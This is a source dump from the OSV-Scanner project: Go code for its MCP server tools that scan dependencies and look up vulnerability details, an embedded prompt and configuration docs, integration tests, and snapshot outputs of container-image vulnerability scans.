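// serves it over SSE when the --sse flag is set, or over stdin/stdout otherwise.
//
// Security note: the SSE branch wraps the SDK handler in a plain http.Server.
// This code adds no authentication or Origin validation of its own (whether the
// SDK handler performs any is not visible here), and the registered scan tool
// accepts client-chosen filesystem paths. Keep the listening address on a
// loopback interface unless access is restricted by other means.
//
// Returns the error from the transport, or nil when the SSE server stopped
// because ctx was cancelled.
func action(ctx context.Context, cmd *cli.Command) error {
	s := mcp.NewServer(&mcp.Implementation{
		Name:    "OSV-Scanner",
		Version: version.OSVVersion,
	}, nil)

	mcp.AddTool(s, &mcp.Tool{
		Name: "scan_vulnerable_dependencies",
		Description: "Scans a source directory for vulnerable dependencies." +
			" Walks the given directory and uses osv.dev to query for vulnerabilities matching the found dependencies." +
			" Use this tool to check that the user's project is not depending on known vulnerable code.",
	}, handleScan)

	// TODO(another-rex): Ideally both of the following tools would be resources, but gemini-cli does not support those yet.
	mcp.AddTool(s, &mcp.Tool{
		Name:        "get_vulnerability_details",
		Description: "Retrieves the full JSON details for a given vulnerability ID.",
	}, handleVulnIDRetrieval)

	mcp.AddTool(s, &mcp.Tool{
		Name:        "ignore_vulnerability",
		Description: "Provides instructions for writing a config file to exclude vulnerabilities from the scan report.",
	}, handleIgnoreVulnerability)

	s.AddPrompt(&mcp.Prompt{
		Name:        "scan_deps",
		Description: "Scans your project dependencies for known vulnerabilities.",
	}, handleScanDepsPrompt)

	// Provide two options, sse on a network port, or stdio.
	if cmd.IsSet("sse") {
		sseAddr := cmd.String("sse")
		cmdlogger.Infof("Starting SSE server on %s", sseAddr)

		// Every incoming request is served by the same server instance.
		handler := mcp.NewSSEHandler(func(_ *http.Request) *mcp.Server {
			return s
		}, nil)

		srv := &http.Server{
			Addr:        sseAddr,
			Handler:     handler,
			ReadTimeout: 30 * time.Second,
			// NOTE(review): SSE responses are long-lived; confirm that this write
			// timeout does not cut an event stream off after 30 seconds.
			WriteTimeout: 30 * time.Second,
			IdleTimeout:  120 * time.Second,
		}

		// Stop the listener when the command context is cancelled, so the
		// endpoint does not keep accepting requests after the caller asked the
		// command to stop.
		served := make(chan struct{})
		go func() {
			select {
			case <-ctx.Done():
				shutdownCtx, cancel := context.WithTimeout(context.WithoutCancel(ctx), 5*time.Second)
				defer cancel()
				// Open event streams may never become idle, so fall back to a
				// hard close when the graceful shutdown does not finish in time.
				if err := srv.Shutdown(shutdownCtx); err != nil {
					_ = srv.Close()
				}
			case <-served:
			}
		}()

		err := srv.ListenAndServe()
		close(served)

		// http.ErrServerClosed is only returned after the shutdown above.
		if err != nil && !errors.Is(err, http.ErrServerClosed) {
			cmdlogger.Errorf("mcp error: %s", err)
			return err
		}
	} else {
		// NOTE(review): presumably this keeps stdout free for the MCP stdio
		// transport; confirm against cmdlogger.
		cmdlogger.SendEverythingToStderr()
		cmdlogger.Infof("Starting MCP server on stdio")
		if err := s.Run(ctx, &mcp.StdioTransport{}); err != nil {
			cmdlogger.Errorf("mcp error: %s", err)
			return err
		}
	}

	return nil
}

// handleScan runs a scan over the client-supplied paths and returns the result
// as text: "No issues found" when the scanner reports nothing, otherwise the
// collected "Scanned ..." lines followed by the vertical results report.
//
// Every vulnerability in the scan result is also stored in the package-level
// vulnerability cache, keyed by its ID, for later get_vulnerability_details
// calls.
//
// Security note: input.Paths is passed to the scanner as received; this handler
// does not restrict which locations a client may ask to have scanned.
func handleScan(_ context.Context, _ *mcp.CallToolRequest, input *scanVulnerableDependenciesInput) (*mcp.CallToolResult, any, error) {
	statsCollector := fileOpenedLogger{}

	action := osvscanner.ScannerActions{
		DirectoryPaths:      input.Paths,
		ScanLicensesSummary: false,
		ExperimentalScannerActions: osvscanner.ExperimentalScannerActions{
			StatsCollector: &statsCollector,
		},
		CallAnalysisStates: map[string]bool{
			"go": true,
		},
		Recursive: input.Recursive,
	}

	//nolint:contextcheck // passing the context in would be a breaking change
	scanResults, err := osvscanner.DoScan(action)
	// ErrVulnerabilitiesFound is the expected outcome when something was found;
	// any other error aborts the tool call.
	if err != nil && !errors.Is(err, osvscanner.ErrVulnerabilitiesFound) {
		return nil, nil, fmt.Errorf("failed to run scanner: %w", err)
	}

	vulnCacheMu.Lock()
	for _, vuln := range scanResults.Flatten() {
		vulnCacheMap[vuln.Vulnerability.GetId()] = vuln.Vulnerability
	}
	vulnCacheMu.Unlock()

	if err == nil {
		return &mcp.CallToolResult{
			Content: []mcp.Content{
				&mcp.TextContent{Text: "No issues found"},
			},
		}, nil, nil
	}

	buf := strings.Builder{}
	for _, s := range statsCollector.collectedLines {
		buf.WriteString(s + "\n")
	}

	// Turn colours off before rendering, so the tool result is plain text.
	text.DisableColors()
	output.PrintVerticalResults(&scanResults, &buf, false)

	return &mcp.CallToolResult{
		Content: []mcp.Content{
			&mcp.TextContent{Text: buf.String()},
		},
	}, nil, nil
}

// getVulnerabilityDetailsInput is the input for the get_vulnerability_details tool.
type getVulnerabilityDetailsInput struct {
	VulnID string `json:"vuln_id" jsonschema:"The OSV vulnerability ID to retrieve details for."`
}

// handleVulnIDRetrieval returns the pretty-printed JSON record for the
// requested vulnerability ID. The package-level cache is consulted first; on a
// miss the record is fetched with the default osv.dev client and then cached.
//
// An empty or whitespace-only ID is rejected before any lookup is attempted.
// Cache entries are only ever added, never evicted.
func handleVulnIDRetrieval(ctx context.Context, _ *mcp.CallToolRequest, input *getVulnerabilityDetailsInput) (*mcp.CallToolResult, any, error) {
	// The ID is client-controlled and ends up in an outbound API request, so
	// refuse the degenerate case up front.
	if strings.TrimSpace(input.VulnID) == "" {
		return nil, nil, errors.New("vuln_id must not be empty")
	}

	vulnCacheMu.RLock()
	vuln, found := vulnCacheMap[input.VulnID]
	vulnCacheMu.RUnlock()

	if !found {
		var err error
		vuln, err = osvdev.DefaultClient().GetVulnByID(ctx, input.VulnID)
		if err != nil {
			// NOTE(review): every lookup failure is reported as "not found",
			// which presumably includes transport errors as well.
			return nil, nil, fmt.Errorf("vulnerability with ID %s not found: %w", input.VulnID, err)
		}

		vulnCacheMu.Lock()
		vulnCacheMap[input.VulnID] = vuln
		vulnCacheMu.Unlock()
	}

	jsonBytes, err := protojson.Marshal(vuln)
	if err != nil {
		return nil, nil, err
	}

	prettyJSON := pretty.Pretty(jsonBytes)

	return &mcp.CallToolResult{
		Content: []mcp.Content{
			&mcp.TextContent{
				Text: string(prettyJSON),
			},
		},
	}, nil, nil
}

// ignoreVulnerabilityInput is a placeholder to enable the tool call,
// as it seems like go-sdk mcp does not support a tool call with no arguments.
type ignoreVulnerabilityInput struct {
	// Extra field is needed as a placeholder to prevent the llm from erroring when calling the tool
	Verbose bool `json:"verbose" jsonschema:"ignore this parameter"`
}

// configInstructions holds the embedded contents of configuration-instructions.md.
//
//go:embed configuration-instructions.md
var configInstructions string

// handleIgnoreVulnerability does not perform any actual actions, but instead provides the instructions of how
// to write an ignore file to the LLM using this tool, so that it can correctly write the ignore file.
func handleIgnoreVulnerability(_ context.Context, _ *mcp.CallToolRequest, _ *ignoreVulnerabilityInput) (*mcp.CallToolResult, any, error) {
	return &mcp.CallToolResult{
		Content: []mcp.Content{
			&mcp.TextContent{Text: configInstructions},
		},
	}, nil, nil
}

// scanDepsPrompt is the prompt that is sent to the AI model when the scan_deps prompt is requested.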
// //go:embed scan-deps-prompt.md var scanDepsPrompt string func handleScanDepsPrompt(_ context.Context, _ *mcp.GetPromptRequest) (*mcp.GetPromptResult, error) { return &mcp.GetPromptResult{ Description: "Dependency vulnerability analysis", Messages: []*mcp.PromptMessage{ { Role: "assistant", Content: &mcp.TextContent{ Text: scanDepsPrompt, }, }, }, }, nil } ================================================ FILE: cmd/osv-scanner/mcp/configuration-instructions.md ================================================ --- layout: page permalink: /configuration/ nav_order: 5 --- # Configuration To configure scanning, place an osv-scanner.toml file in the scanned file's directory. This does not propagate to child directories. **Example:** ``` /Cargo.lock /osv-scanner.toml (1) /child-dir/go.mod /child-dir/osv-scanner.toml (2) /child-dir/nested-dir/package-lock.json ``` `osv-scanner.toml (1)` will only apply to `Cargo.lock`, `osv-scanner.toml (2)` will only apply to `go.mod`, and no config will apply to `package-lock.json`. To override `osv-scanner.toml` files, pass the `--config=/path/to/config.toml` flag with the path to the configuration you want to apply instead, this will apply `config.toml` to all files parsed, and ignore `osv-scanner.toml` in all directories. ## Ignore vulnerabilities by ID To ignore a vulnerability, enter the ID under the `IgnoredVulns` key. Optionally, add an expiry date or reason. ### Example ```toml [[IgnoredVulns]] id = "GO-2022-0968" # ignoreUntil = 2022-11-09 # Optional exception expiry date reason = "No ssh servers are connected to or hosted in Go lang" [[IgnoredVulns]] id = "GO-2022-1059" # ignoreUntil = 2022-11-09 # Optional exception expiry date reason = "No external http servers are written in Go lang." ``` Ignoring a vulnerability will also ignore vulnerabilities that are considered aliases of that vulnerability. 
================================================ FILE: cmd/osv-scanner/mcp/integration_test.go ================================================ package mcp_test import ( "context" "net" "net/http" "os" "os/exec" "path/filepath" "runtime" "testing" "time" "github.com/google/osv-scanner/v2/internal/testutility" "github.com/modelcontextprotocol/go-sdk/mcp" ) // TestIntegration_MCP_SSE_Subprocess validates the experimental-mcp command by: // 1. Building the binary. // 2. Starting it as an MCP server. // 3. Connecting a client. // 4. Running tools (scan_vulnerable_dependencies, get_vulnerability_details). // //nolint:paralleltest // This test is not parallelizable func TestIntegration_MCP_SSE_Subprocess(t *testing.T) { if testing.Short() { testutility.Skip(t, "skipping integration test in short mode") } binPath := buildTestBinary(t) addr := findFreePort(t) // Start the server ctx, cancel := context.WithCancel(context.Background()) defer cancel() cmdRun := startMCPServer(t, ctx, binPath, addr) defer func() { cancel() _ = cmdRun.Wait() }() // Wait for server to be ready baseURL := "http://" + addr + "/sse" waitForServer(t, baseURL) // Connect Client client := connectMCPClient(t, ctx, baseURL) defer client.Close() // Use persistent testdata/go-project testDataPath, err := filepath.Abs("testdata/go-project") if err != nil { t.Fatalf("failed to get absolute path: %v", err) } if _, err := os.Stat(testDataPath); os.IsNotExist(err) { t.Fatalf("testdata/go-project does not exist at %s", testDataPath) } var vulnID string // Step 1: Scan for vulnerabilities t.Run("ScanVulnerableDependencies", func(t *testing.T) { scanResult, err := client.CallTool(ctx, &mcp.CallToolParams{ Name: "scan_vulnerable_dependencies", Arguments: map[string]any{ "paths": []string{testDataPath}, "recursive": true, "ignore_glob_patterns": []string{}, }, }) if err != nil { t.Fatalf("call to scan_vulnerable_dependencies failed: %v", err) } if len(scanResult.Content) == 0 { t.Fatal("scan result content is 
empty") } textRes, ok := scanResult.Content[0].(*mcp.TextContent) if !ok { t.Fatalf("expected TextContent, got %T", scanResult.Content[0]) } output := textRes.Text t.Logf("Scan completed. Output length: %d", len(output)) testutility.NewSnapshot().MatchText(t, output) vulnID = "GO-2023-1558" }) // Step 2: Get details for the found vulnerability t.Run("GetVulnerabilityDetails", func(t *testing.T) { detailsResult, err := client.CallTool(ctx, &mcp.CallToolParams{ Name: "get_vulnerability_details", Arguments: map[string]any{ "vuln_id": vulnID, }, }) if err != nil { t.Fatalf("call to get_vulnerability_details failed: %v", err) } if len(detailsResult.Content) == 0 { t.Log("Details Result Content is empty") return } t.Logf("Details Result Content: %v", detailsResult.Content[0]) testutility.NewSnapshot().MatchJSON(t, detailsResult) }) } // buildTestBinary builds the osv-scanner binary to a temporary directory. func buildTestBinary(t *testing.T) string { t.Helper() tempDir := t.TempDir() binPath := filepath.Join(tempDir, "osv-scanner-mcp-test") if runtime.GOOS == "windows" { binPath += ".exe" } // We use the full package path to ensure we build the correct main package. cmdBuild := exec.CommandContext( context.Background(), "go", "build", "-ldflags", "-X 'github.com/google/osv-scanner/v2/internal/config.OSVScannerConfigName=osv-scanner-test.toml'", "-o", binPath, "github.com/google/osv-scanner/v2/cmd/osv-scanner", ) cmdBuild.Stdout = os.Stdout cmdBuild.Stderr = os.Stderr if err := cmdBuild.Run(); err != nil { t.Fatalf("failed to build binary: %v", err) } return binPath } // findFreePort lets the OS choose a free port and returns the address string (e.g. "127.0.0.1:12345"). func findFreePort(t *testing.T) string { t.Helper() var lc net.ListenConfig ln, err := lc.Listen(context.Background(), "tcp", "localhost:0") if err != nil { t.Fatalf("failed to listen: %v", err) } addr := ln.Addr().String() ln.Close() return addr } // startMCPServer starts the mcp server in a subprocess. 
// //nolint:revive // t should be the first argument func startMCPServer(t *testing.T, ctx context.Context, binPath, addr string) *exec.Cmd { t.Helper() cmdRun := exec.CommandContext(ctx, binPath, "experimental-mcp", "--sse", addr) cmdRun.Stderr = os.Stderr cmdRun.Stdout = os.Stdout t.Logf("Starting MCP server on %s", addr) if err := cmdRun.Start(); err != nil { t.Fatalf("failed to start server: %v", err) } return cmdRun } // connectMCPClient connects to the MCP server via SSE. // //nolint:revive // t should be the first argument func connectMCPClient(t *testing.T, ctx context.Context, baseURL string) *mcp.ClientSession { t.Helper() transport := &mcp.SSEClientTransport{ Endpoint: baseURL, } client := mcp.NewClient(&mcp.Implementation{ Name: "test-client", Version: "1.0.0", }, nil) session, err := client.Connect(ctx, transport, nil) if err != nil { t.Fatalf("failed to connect to MCP server: %v", err) } return session } func waitForServer(t *testing.T, url string) { t.Helper() deadline := time.Now().Add(15 * time.Second) for time.Now().Before(deadline) { //nolint:gosec,noctx // This is a test with a local URL resp, err := http.Get(url) if err == nil { resp.Body.Close() return } time.Sleep(100 * time.Millisecond) } t.Fatalf("server failed to start listening at %s within timeout", url) } ================================================ FILE: cmd/osv-scanner/mcp/scan-deps-prompt.md ================================================ You are a highly skilled senior security analyst. Your primary task is to conduct a security audit of the vulnerabilities in the dependencies of this project. Utilizing your skillset, you must operate by strictly following the operating principles defined in your context. **Step 1: Perform initial scan** Use the scan_vulnerable_dependencies with recursive on the project, always use the absolute path. This will return a report of all the relevant lockfiles and all vulnerable dependencies in those files. 
**Step 2: Analyse the report** Go through the report and determine the relevant project lockfiles (ignoring lockfiles in test directories), and prioritise which vulnerability to fix based on the description and severity. If more information is needed about a vulnerability, use get_vulnerability_details. **Step 3: Prioritisation** Give advice on which vulnerabilities to prioritise fixing, and general advice on how to go about fixing them by updating. Don't try to automatically update for the user without input. ================================================ FILE: cmd/osv-scanner/mcp/stats.go ================================================ package mcp import ( "fmt" "path/filepath" "github.com/google/osv-scalibr/stats" "github.com/google/osv-scanner/v2/internal/output" ) type fileOpenedLogger struct { stats.NoopCollector collectedLines []string } var _ stats.Collector = &fileOpenedLogger{} func (c *fileOpenedLogger) AfterExtractorRun(_ string, extractorstats *stats.AfterExtractorStats) { if extractorstats.Error != nil { // Don't log scanned if error occurred return } pkgsFound := len(extractorstats.Inventory.Packages) c.collectedLines = append(c.collectedLines, fmt.Sprintf( "Scanned %s file and found %d %s", filepath.Join(extractorstats.Root, extractorstats.Path), pkgsFound, output.Form(pkgsFound, "package", "packages"), )) } ================================================ FILE: cmd/osv-scanner/mcp/testdata/go-project/go.mod ================================================ module example.com/test go 1.25.3 require github.com/ipfs/go-bitfield v1.0.0 ================================================ FILE: cmd/osv-scanner/mcp/testdata/go-project/go.sum ================================================ github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ= github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus= ================================================ FILE: 
cmd/osv-scanner/mcp/testdata/go-project/main.go ================================================ package main import ( "github.com/ipfs/go-bitfield" ) func main() { _ = bitfield.NewBitfield(1) } ================================================ FILE: cmd/osv-scanner/mcp/testdata/go-project/osv-scanner-test.toml ================================================ ================================================ FILE: cmd/osv-scanner/mcp/testdata/go-project/osv-scanner.toml ================================================ [[PackageOverrides]] ignore = true ================================================ FILE: cmd/osv-scanner/mcp/testmain_test.go ================================================ package mcp_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/cmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" "github.com/google/osv-scanner/v2/cmd/osv-scanner/mcp" "github.com/google/osv-scanner/v2/internal/testlogger" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { slog.SetDefault(slog.New(testlogger.New())) // This is technically not necessary, as we are running mcp via a subprocess testcmd.CommandsUnderTest = []cmd.CommandBuilder{mcp.Command} m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: cmd/osv-scanner/scan/__snapshots__/command_test.snap ================================================ [TestCommand_SubCommands/scan_with_a_flag - 1] Scanning dir ./testdata/locks-one-with-nested Scanned /testdata/locks-one-with-nested/nested/composer.lock file and found 1 package Scanned /testdata/locks-one-with-nested/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
No issues found --- [TestCommand_SubCommands/scan_with_a_flag - 2] --- [TestCommand_SubCommands/with_no_arguments - 1] NAME: osv-scanner scan - scans projects and container images for dependencies, and checks them against the OSV database. USAGE: osv-scanner scan [command [command options]] DESCRIPTION: scans projects and container images for dependencies, and checks them against the OSV database. COMMANDS: source scans a source project's dependencies for known vulnerabilities using the OSV database. image detects vulnerabilities in a container image's dependencies, pulling the image if it's not found locally OPTIONS: --help, -h show help --- [TestCommand_SubCommands/with_no_arguments - 2] --- [TestCommand_SubCommands/with_no_subcommand - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_SubCommands/with_no_subcommand - 2] --- [TestCommand_SubCommands/with_scan_subcommand - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. No issues found --- [TestCommand_SubCommands/with_scan_subcommand - 2] --- ================================================ FILE: cmd/osv-scanner/scan/command.go ================================================ // Package scan implements the `scan` command for osv-scanner. 
package scan import ( "io" "net/http" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan/image" "github.com/google/osv-scanner/v2/cmd/osv-scanner/scan/source" "github.com/urfave/cli/v3" ) const sourceSubCommand = "source" const DefaultSubcommand = sourceSubCommand var Subcommands = []string{sourceSubCommand, "image"} func Command(stdout, stderr io.Writer, client *http.Client) *cli.Command { return &cli.Command{ Name: "scan", Usage: "scans projects and container images for dependencies, and checks them against the OSV database.", Description: "scans projects and container images for dependencies, and checks them against the OSV database.", Commands: []*cli.Command{ source.Command(stdout, stderr, client), image.Command(stdout, stderr, client), }, } } ================================================ FILE: cmd/osv-scanner/scan/command_test.go ================================================ package scan_test import ( "testing" "github.com/google/osv-scanner/v2/cmd/osv-scanner/internal/testcmd" ) // Tests all subcommands here. 
func TestCommand_SubCommands(t *testing.T) {
	// Table-driven check of how arguments are dispatched with and without an
	// explicit `scan` subcommand; output is compared against stored snapshots.
	t.Parallel()

	// One cassette client for the whole test; each subtest derives its own
	// client from it below.
	client := testcmd.InsertCassette(t)

	// NOTE(review): the leading "" in every Args slice looks like the argv[0]
	// placeholder — confirm against testcmd.
	cases := []testcmd.Case{
		// bare `scan` with nothing to scan: expected to exit with 127
		{
			Name: "with_no_arguments",
			Args: []string{"", "scan"},
			Exit: 127,
		},
		// a path given directly, no subcommand named
		{
			Name: "with_no_subcommand",
			Args: []string{"", "./testdata/locks-many/composer.lock"},
			Exit: 0,
		},
		// the same path, with the `scan` subcommand spelled out
		{
			Name: "with_scan_subcommand",
			Args: []string{"", "scan", "./testdata/locks-many/composer.lock"},
			Exit: 0,
		},
		// `scan` followed by a flag and then the target
		{
			Name: "scan_with_a_flag",
			Args: []string{"", "scan", "--recursive", "./testdata/locks-one-with-nested"},
			Exit: 0,
		},
		// TODO: add tests for other future subcommands
	}

	for _, tc := range cases {
		t.Run(tc.Name, func(t *testing.T) {
			t.Parallel()

			// The cassette client is dereferenced, so the helper receives it by value.
			tc.HTTPClient = testcmd.WithTestNameHeader(t, *client)
			testcmd.RunAndMatchSnapshots(t, tc)
		})
	}
}

================================================ FILE: cmd/osv-scanner/scan/image/__snapshots__/command_test.snap ================================================ [TestCommand_Docker/Fake_alpine_image - 1] Checking if docker image ("alpine:non-existent-tag") exists locally... --- [TestCommand_Docker/Fake_alpine_image - 2] Docker command exited with code ("/usr/bin/docker pull -q alpine:non-existent-tag"): 1 STDERR: > Error response from daemon: manifest for alpine:non-existent-tag not found: manifest unknown: manifest unknown failed to pull container image: failed to run docker command --- [TestCommand_Docker/Fake_image_entirely - 1] Checking if docker image ("this-image-definitely-does-not-exist-abcde:with-tag") exists locally...
--- [TestCommand_Docker/Fake_image_entirely - 2] Docker command exited with code ("/usr/bin/docker pull -q this-image-definitely-does-not-exist-abcde:with-tag"): 1 STDERR: > Error response from daemon: pull access denied for this-image-definitely-does-not-exist-abcde, repository does not exist or may require 'docker login': denied: requested access to the resource is denied failed to pull container image: failed to run docker command --- [TestCommand_Docker/Real_Alpine_image - 1] Checking if docker image ("alpine:3.18.9") exists locally... Saving docker image ("alpine:3.18.9") to temporary file... Scanning image "alpine:3.18.9" Container Scanning Result (Alpine Linux v3.18) (Based on "alpine" image): Total 2 packages affected by 3 known vulnerabilities (0 Critical, 1 High, 2 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 3 vulnerabilities can be fixed. Alpine:v3.18 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | musl | 1.2.4-r2 | Fix Available | 1 | musl, musl-utils | # 0 Layer | alpine | | openssl | 3.1.7-r0 | Fix Available | 2 | libcrypto3, libssl3 | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_Docker/Real_Alpine_image - 2] --- [TestCommand_Docker/Real_empty_image_with_no_tag,_invalid_scan_target - 1] --- [TestCommand_Docker/Real_empty_image_with_no_tag,_invalid_scan_target - 2] "hello-world" is not a tagged image name --- [TestCommand_Docker/Real_empty_image_with_tag - 1] Checking if docker image ("hello-world:linux") exists locally... Saving docker image ("hello-world:linux") to temporary file... Scanning image "hello-world:linux" --- [TestCommand_Docker/Real_empty_image_with_tag - 2] No package sources found, --help for usage information. --- [TestCommand_Docker/no_image_argument - 1] --- [TestCommand_Docker/no_image_argument - 2] please provide an image name or see the help document --- [TestCommand_Docker/real_alpine_image_without_apk_extractor_enabled - 1] Checking if docker image ("alpine:3.18.9") exists locally... Saving docker image ("alpine:3.18.9") to temporary file... Scanning image "alpine:3.18.9" --- [TestCommand_Docker/real_alpine_image_without_apk_extractor_enabled - 2] No package sources found, --help for usage information. --- [TestCommand_Docker/real_empty_image_with_tag_and_allow_no_lockfiles_flag - 1] Checking if docker image ("hello-world:linux") exists locally... Saving docker image ("hello-world:linux") to temporary file... Scanning image "hello-world:linux" No package sources found No issues found --- [TestCommand_Docker/real_empty_image_with_tag_and_allow_no_lockfiles_flag - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/add_extractors - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 2 packages affected by 4 known vulnerabilities (2 Critical, 1 High, 1 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. 
Alpine +------------------------------------------------------------------------------------------------+ | Source:sbom:/data/alpine-zlib-16.cdx.json:lib/apk/db/installed | +---------+-------------------+------------------+------------+------------------+---------------+ | PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | INTRODUCED LAYER | IN BASE IMAGE | +---------+-------------------+------------------+------------+------------------+---------------+ | zlib | 1.2.12-r1 | No fix available | 3 | # 2 Layer | -- | +---------+-------------------+------------------+------------+------------------+---------------+ Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. 
--- [TestCommand_ExplicitExtractors_WithDefaults/add_extractors - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out#01 - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out#01 - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Container Scanning Result (Alpine Linux v3.10) (Based on "alpine" image): Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. 
Alpine:v3.10 +------------------------------------------------------------------------------------------------------------------------------+ | Source:os:/lib/apk/db/installed | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | SOURCE PACKAGE | INSTALLED VERSION | FIX AVAILABLE | VULN COUNT | BINARY PACKAGES (COUNT) | INTRODUCED LAYER | IN BASE IMAGE | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ | apk-tools | 2.10.6-r0 | Fix Available | 1 | apk-tools | # 0 Layer | alpine | +----------------+-------------------+---------------+------------+-------------------------+------------------+---------------+ For the most comprehensive scan results, we recommend using the HTML output: `osv-scanner scan image --serve `. You can also view the full vulnerability list in your terminal with: `osv-scanner scan image --format vertical `. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/add_extractors - 1] Scanning local image tarball "testdata/test-alpine-sbom.tar" Total 1 package affected by 3 known vulnerabilities (1 Critical, 1 High, 1 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------------------+ | https://osv.dev/ALPINE-CVE-2022-37434 | 9.8 | Alpine | zlib | 1.2.12-r1 | -- | data/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.12-r1 | -- | data/alpine-zlib-16.cdx.json:lib/apk/db/installed | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.12-r1 | -- | data/alpine-zlib-16.cdx.json:lib/apk/db/installed | +---------------------------------------+------+-----------+---------+-----------+---------------+---------------------------------------------------+ --- [TestCommand_ExplicitExtractors_WithoutDefaults/add_extractors - 2] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out - 2] at least one extractor must be enabled --- 